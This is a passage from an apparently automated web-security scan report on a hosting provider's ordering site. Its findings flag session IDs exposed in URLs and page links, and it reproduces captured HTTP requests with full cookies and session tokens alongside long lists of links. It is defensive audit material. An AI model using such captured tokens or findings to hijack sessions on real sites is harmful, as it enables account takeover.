<li><a class="core_button_normal" href="/xml/order/Instant;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">Domains</a></li><li><a class="core_button_normal" href="/xml/order/Hosting;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">Linux Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MsHosting;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">Microsoft Hosting</a>
...[SNIP]...
<li class="first-item"><a class="core_button_normal" href="/xml/order/MailInstantMail;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">Instant Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailXchange;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">1&amp;1 MailXchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MicrosoftExchange;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">Microsoft&reg; Exchange</a>
...[SNIP]...
<li class="first-item"><a class="core_button_normal" href="/xml/order/ServerPremium;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">Dedicated Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/CloudDynamicServer;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">Dynamic Cloud Server</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/VirtualServer;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">Virtual Servers</a>
...[SNIP]...
<li class="first-item"><a class="core_button_normal" href="/xml/order/LocalSubmission;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">ListLocal</a></li><li><a class="core_button_normal" href="/xml/order/Sharepoint;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">Microsoft&reg; SharePoint&reg;</a>
...[SNIP]...
<li class="first-item"><a class="core_button_normal" href="/xml/order/Eshops;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">eShops</a>
...[SNIP]...
</span><a class="btn btn-blue-medium btn-pos-home" href="/xml/order/Mail;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static"><span>More</span></a><a class="teaserlink" href="/xml/order/Mail;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static"></a>
...[SNIP]...
<li>Choose between <a class="core_button_normal" href="/xml/order/VirtualServer;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">virtual</a> or <a class="core_button_normal" href="/xml/order/ServerPremium;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">dedicated servers</a><br>and <a class="core_button_normal" href="/xml/order/CloudDynamicServer;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">dynamic cloud servers</a>
...[SNIP]...
</span><a class="btn btn-blue-medium btn-pos-home" href="/xml/order/Server;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static"><span>
...[SNIP]...
</span><a class="btn btn-blue-medium btn-pos-home" href="/xml/order/Eshops;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static"><span>More</span></a><a class="teaserlink" href="/xml/order/Eshops;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static"></a>
...[SNIP]...
</span><a class="btn btn-blue-medium btn-pos-home" href="/xml/order/LocalSubmission;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static"><span>More</span></a><a class="teaserlink" href="/xml/order/LocalSubmission;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static"></a>
...[SNIP]...
</p><a class="btn btn-detail-lightblue" href="/xml/order/Sharepoint;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
More
</a>
...[SNIP]...
</p><a class="btn btn-detail-lightblue" href="/xml/order/MsHosting;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">
More
</a>
...[SNIP]...
</p><a rel="height=590, width=665" class="window-open" href="/xml/order/popupGreenPower;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">More...</a>
...[SNIP]...
<br><a rel="height=690, width=737" class="window-open" href="/xml/order/popupWebsiteMagazine;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">More...</a>
...[SNIP]...
<br><a class="core_button_normal" href="/xml/order/TcSpecialOffers;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">Click here</a>
...[SNIP]...
<p><a class="nounderline" href="/links;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static">1and1.com</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/AboutUs;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=hd.nav.about" rel="button-hd-nav-about">
About 1&amp;1
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkId=ft.nav.pressroom&amp;site=ST.PRE.US&amp;origin.page=Home&amp;linkOrigin=Home&amp;linkId=ft.nav.pressroom" rel="redirectlink-ft-nav-pressroom">
Press Room
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Gtc;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=ft.nav.tandc" rel="button-ft-nav-tandc">
T&amp;C
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/PrivacyPolicy;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=ft.nav.privacypolicy" rel="button-ft-nav-privacypolicy">
Privacy Policy
</a>
...[SNIP]...
<li><a rel="height=512, width=683" class="window-open" href="/xml/order/TellAFriend;jsessionid=A9CC7F5386BD5F5ED9C6322067094898.TCpfix140a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Home&amp;linkId=ft.nav.tellafriend&amp;linkType=txt">
Tell a friend
</a>
...[SNIP]...

3.72. http://order.1and1.com/xml/order/Hosting  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/Hosting

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Home;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300642626825
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4ce5cf5491256400; UT=8Z1wsLzAmT09mYHNpcDZuaDUnMWpdVy9GOTMbHxwcGzAyMC0tMC8pLDAjJSQjIEUzX1RWZBweMGA5Y3I4KywoJywoJiknISkgHyhgYSczOmpzOSwtKSgtKicqJSgpIiM=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:6:AAABLtRX2K_J5jNaUkl1B0HVVvj*yNyZ:1300642650287; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:37:21 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=0b2Q0NzguV1dXUWRaYSdfWT0vOXJlXzdOQTsjJyQkIyEjIR4eISAaNDgrLSwrKE07Z1xebCQmIVEqVGMpHB0wLzQwLjEvKTEoJzBoaS8kK1tkKh0eGjA1Mi8yLTAxKis=; Expires=Fri, 07-Apr-2079 20:51:28 GMT; Path=/
ETag: 1c80cdab16ac208079c7642ff888736c
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 59725


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...

3.73. http://order.1and1.com/xml/order/Hosting  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://order.1and1.com
Path:   /xml/order/Hosting

Issue detail

The response contains the following links that appear to contain session tokens:

Request

GET /xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1
Host: order.1and1.com
Proxy-Connection: keep-alive
Referer: http://order.1and1.com/xml/order/Home;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__reuse=1300642626825
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lastpage=Home; ac-whom-us=OM.US.USa02K18619H7072a; variant.configname=2010-04-14; variant=QUM6ZGVmYXVsdA==; __PFIX_TST_=4ce5cf5491256400; UT=8Z1wsLzAmT09mYHNpcDZuaDUnMWpdVy9GOTMbHxwcGzAyMC0tMC8pLDAjJSQjIEUzX1RWZBweMGA5Y3I4KywoJywoJiknISkgHyhgYSczOmpzOSwtKSgtKicqJSgpIiM=; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:6:AAABLtRX2K_J5jNaUkl1B0HVVvj*yNyZ:1300642650287; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10

Response

HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 17:37:21 GMT
Server: Apache
Expires: Mon, 05 Jul 1970 05:07:00 GMT
Cache-Control: private
Set-Cookie: UT=0b2Q0NzguV1dXUWRaYSdfWT0vOXJlXzdOQTsjJyQkIyEjIR4eISAaNDgrLSwrKE07Z1xebCQmIVEqVGMpHB0wLzQwLjEvKTEoJzBoaS8kK1tkKh0eGjA1Mi8yLTAxKis=; Expires=Fri, 07-Apr-2079 20:51:28 GMT; Path=/
ETag: 1c80cdab16ac208079c7642ff888736c
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 59725


<!DOCTYPE html
PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en-US"><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<ti
...[SNIP]...
<div id="header"><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkId=hd.log.eue&amp;site=PU.WH.US&amp;origin.page=Hosting&amp;linkOrigin=Hosting&amp;linkId=hd.log.eue" rel="redirectlink-hd-log-eue"><img alt="1&amp;1 Internet AG" id="header_logo" src="/modules/frontend-skin-odin/img/frontend-skin-odin/header/logo_1and1.png" class="alphapng">
...[SNIP]...
<li class="dropdown left first_item"><a class="core_button_normal" href="/xml/order/Home;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Hosting&amp;linkId=hd.nav.home" rel="button-hd-nav-home">Home</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Instant;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Hosting&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Domains</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Instant;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Hosting&amp;linkId=hd.nav.domainSearch" rel="button-hd-nav-domainSearch">Domain Search</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/DomaininfoMove;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Hosting&amp;linkId=hd.nav.domainTransfer" rel="button-hd-nav-domainTransfer">Domain Transfer</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Mail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Hosting&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailInstantMail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Hosting&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">Instant Mail</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MailXchange;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Hosting&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">1&amp;1 MailXchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MicrosoftExchange;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Hosting&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft&reg; Exchange</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Hosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Hosting&amp;linkId=hd.nav.domains">Linux Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MsHosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Hosting&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">Microsoft Hosting</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkId=ngh&amp;site=PU.NGH.US&amp;origin.page=Hosting&amp;page=switch&amp;linkOrigin=Hosting&amp;linkId=ngh" rel="redirectlink-ngh">
MyBusiness Site
</a>
...[SNIP]...
<li class="dropdown left"><a class="core_button_normal" href="/xml/order/Eshops;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Hosting&amp;linkId=hd.nav.ecommerce" rel="button-hd-nav-ecommerce">eCommerce</a></li><li class="dropdown left"><a class="core_button_normal" href="/xml/order/Server;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Hosting&amp;linkId=hd.nav.server" rel="button-hd-nav-server">Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/ServerPremium;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Hosting&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">1&amp;1 Dedicated Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/CloudDynamicServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Hosting&amp;linkId=hd.nav.domains" rel="button-hd-nav-domains">
1&amp;1 Dynamic Cloud Server
</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/VirtualServer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Hosting&amp;linkId=hd.nav.mail" rel="button-hd-nav-mail">1&amp;1 Virtual Servers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/LocalSubmission;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Hosting&amp;linkId=hd.nav.listlocal" rel="button-hd-nav-listlocal">ListLocal</a></li><li><a class="core_button_normal" href="/xml/order/Sharepoint;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Hosting&amp;linkId=hd.nav.sharepoint" rel="button-hd-nav-sharepoint">Microsoft&reg; Sharepoint&reg;</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/MsHosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;linkOrigin=Hosting&amp;linkId=hd.tab.microsofthosting" rel="button-hd-tab-microsofthosting"><span>
...[SNIP]...
<li class="two-rows"><a class="core_button_normal" href="/xml/order/MsHosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
Microsoft<br>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/Domaininfo;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">All About Domains</a>
...[SNIP]...
<li class="first-level"><a class="core_button_normal" href="/xml/order/Service;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">Service &amp; Support</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/FirstWebsite;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">First Website</a>
...[SNIP]...
<li><a rel="height=480, width=665" class="window-open core_button_normal" href="/xml/order/Moneyback;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
90-Day Guarantee
</a>
...[SNIP]...
<li class="two-rows"><a class="core_button_normal" href="/xml/order/International;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">International Customers</a>
...[SNIP]...
<li><a class="core_button_normal" href="/xml/order/News;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">News</a>
...[SNIP]...
</h4><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;origin.page=Hosting&amp;linkId=weiter&amp;site=PU.NGH.US&amp;page=switch&amp;sourcearea=on"><img src="/oneandone_en_common/img/frontend-hosting/teaser/teaser_ngh.png" alt="" class="alphapng" title="1&amp;1 MyBusiness Site" width="112" height="70">
...[SNIP]...
</p><a class="core_button_normal" href="/xml/order/Jumpto;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;origin.page=Hosting&amp;linkId=weiter&amp;site=PU.NGH.US&amp;page=switch&amp;sourcearea=on">


Details
</a>
...[SNIP]...
<td class="noborder"><a class="btn btn-yellow-small btn-pos-tariff" href="/xml/order/tariffselect;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;__sendingdata=1&amp;packageselection=Hosting&amp;cart.action=add-bundle&amp;cart.bundle=tariff-beginner-package-bundle"><span>
...[SNIP]...
<td class="noborder"><a class="btn btn-yellow-small btn-pos-tariff" href="/xml/order/tariffselect;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;__sendingdata=1&amp;packageselection=Hosting&amp;cart.action=add-bundle&amp;cart.bundle=tariff-home-package-bundle"><span>
...[SNIP]...
<td class="noborder"><a class="btn btn-yellow-small btn-pos-tariff" href="/xml/order/tariffselect;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;__sendingdata=1&amp;packageselection=Hosting&amp;cart.action=add-bundle&amp;cart.bundle=tariff-business-package-bundle"><span>
...[SNIP]...
<td class="noborder"><a class="btn btn-yellow-small btn-pos-tariff" href="/xml/order/tariffselect;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;__sendingdata=1&amp;packageselection=Hosting&amp;cart.action=add-bundle&amp;cart.bundle=tariff-developer-package-bundle"><span>
...[SNIP]...
<td class="noborder"><a class="btn btn-yellow-small btn-pos-tariff" href="/xml/order/tariffselect;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;__sendingdata=1&amp;packageselection=Hosting&amp;cart.action=add-bundle&amp;cart.bundle=tariff-beginner-package-bundle"><span>
...[SNIP]...
<td class="noborder"><a class="btn btn-yellow-small btn-pos-tariff" href="/xml/order/tariffselect;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;__sendingdata=1&amp;packageselection=Hosting&amp;cart.action=add-bundle&amp;cart.bundle=tariff-home-package-bundle"><span>
...[SNIP]...
<td class="noborder"><a class="btn btn-yellow-small btn-pos-tariff" href="/xml/order/tariffselect;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;__sendingdata=1&amp;packageselection=Hosting&amp;cart.action=add-bundle&amp;cart.bundle=tariff-business-package-bundle"><span>
...[SNIP]...
<td class="noborder"><a class="btn btn-yellow-small btn-pos-tariff" href="/xml/order/tariffselect;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static&amp;__sendingdata=1&amp;packageselection=Hosting&amp;cart.action=add-bundle&amp;cart.bundle=tariff-developer-package-bundle"><span>
...[SNIP]...
<td class="feature-banner" colspan="5"><a class="core_button_normal" onclick="return !window.open(this.href,'_blank','toolbar=no,location=no,status=yes,menubar=no,scrollbars=yes,resizable=yes,width=665,height=590,screenX=100,screenY=100');" href="/xml/order/FeatureDreamweaver;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static"><img src="/common/img/components/hosting/vis_softwarebundle.png" alt="Adobe Dreamweaver" class="software alphapng" width="98" height="66">
...[SNIP]...
<td class="feature-banner-link" colspan="5"><a class="core_button_normal" href="/xml/order/MsHosting;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">New Features for Windows&reg; packages</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureDomainDomains;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
Included Domains
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureDomainPdr;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
Private Domain Registration
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureDomainDns;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
DNS Management
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureWebspaceExplorer;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
1&amp;1 Webspace Explorer
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureControlCenter;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
1&amp;1 Control Panel
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureDatabaseDatabase;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
1&amp;1 WebDatabase
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureEmailEmail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
E-mail Accounts
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureEmailWebmail;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
1&amp;1 WebMail 2.0
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureEmailVirusscan;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
Spam Filter
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureDreamweaver;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">Adobe&reg; Dreamweaver&reg; CS4</a>
...[SNIP]...
</span><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureDreamweaver;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">optional</a>
...[SNIP]...
</span><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureDreamweaver;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">optional</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureDreamweaver;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">NetObjects Fusion&reg; 1&amp;1 Edition</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSite-buildingCnba;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
Click-n-Build Applications
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSite-buildingWsb;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
1&amp;1 WebsiteBuilder
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSite-buildingDsc;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
DynamicSiteCreator
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSite-buildingPhotogallery;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
1&amp;1 Photo Gallery
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureCommunicationToolsMerchandise;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
Spreadshirt Merchandising
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureWebdesignIstock;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
iStockphoto image library
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSite-buildingElements;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
1&amp;1 FormBuilder
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSite-buildingContentmoduls;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
1&amp;1 Dynamic Content Catalog
</a>
...[SNIP]...
<td class="feature"><a rel="height=590, width=665" class="window-open" href="/xml/order/FeatureSite-buildingMap;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&amp;__lf=Static">
Maps
</a>
...[SNIP]...
